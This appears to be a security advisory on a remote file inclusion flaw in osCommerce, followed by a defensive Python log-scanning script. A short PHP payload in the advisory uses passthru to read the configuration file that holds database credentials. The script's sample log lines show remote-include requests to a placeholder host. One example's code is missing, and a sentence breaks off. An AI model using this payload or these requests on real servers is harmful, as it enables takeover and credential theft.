Reportedly, exploitation of this type of vulnerability is not possible unless both 'allow_url_fopen' and 'register_globals' are enabled in the site's local PHP configuration. It is good practice to disable any unneeded options. Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: firstname.lastname@example.org.
osCommerce is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver.
-------- Example 1 --------
--- a.php ---
Output: dir listing of the current directory
-------- Example 2 --------
--- b.php ---
<? passthru("/bin/cat application_top.php")?>
Output: outputs the application_top.php file which includes MySQL username,
osCommerce contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the 'include_once.php' script not properly sanitizing user input supplied to the 'include_file' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.
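For defenders reviewing web server logs, the following added example (not part of the original advisory or of osCommerce) flags requests to 'include_once.php' whose 'include_file' parameter carries a remote URL. The log format (common/combined), the /catalog/ path, the host names and the addresses are assumptions, and the sample entries are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# URL schemes PHP can open as remote files when allow_url_fopen is enabled.
REMOTE_RE = re.compile(r'\s*(?:https?|ftps?)://', re.IGNORECASE)

def remote_include_attempts(lines, script="include_once.php", param="include_file"):
    """Return (client, value) pairs for requests passing a remote URL in `param`."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not target.path.endswith("/" + script):
            continue
        # parse_qsl percent-decodes names and values, as PHP does for the query string.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == param and REMOTE_RE.match(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample entries: documentation addresses, placeholder host, assumed /catalog/ path.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2003:10:00:00 +0000] "GET /catalog/include_once.php?include_file=http://remote.example/a.php HTTP/1.0" 200 512',
    '198.51.100.7 - - [01/Jan/2003:10:05:00 +0000] "GET /catalog/include_once.php?include_file=HTTP%3A%2F%2Fremote.example%2Fb.php HTTP/1.0" 200 2048',
    '203.0.113.5 - - [01/Jan/2003:10:06:00 +0000] "GET /catalog/include_once.php?include_file=includes/header.php HTTP/1.0" 200 900',
    '203.0.113.5 - - [01/Jan/2003:10:07:00 +0000] "GET /catalog/index.php?ref=http://www.example.com/ HTTP/1.0" 200 4000',
]

if __name__ == "__main__":
    for client, value in remote_include_attempts(SAMPLE_LOG):
        print(f"{client} requested remote include: {value}")
```

With 'register_globals' enabled the same variable can also arrive in a POST body or cookie, which access logs do not record, so this check covers query-string requests only.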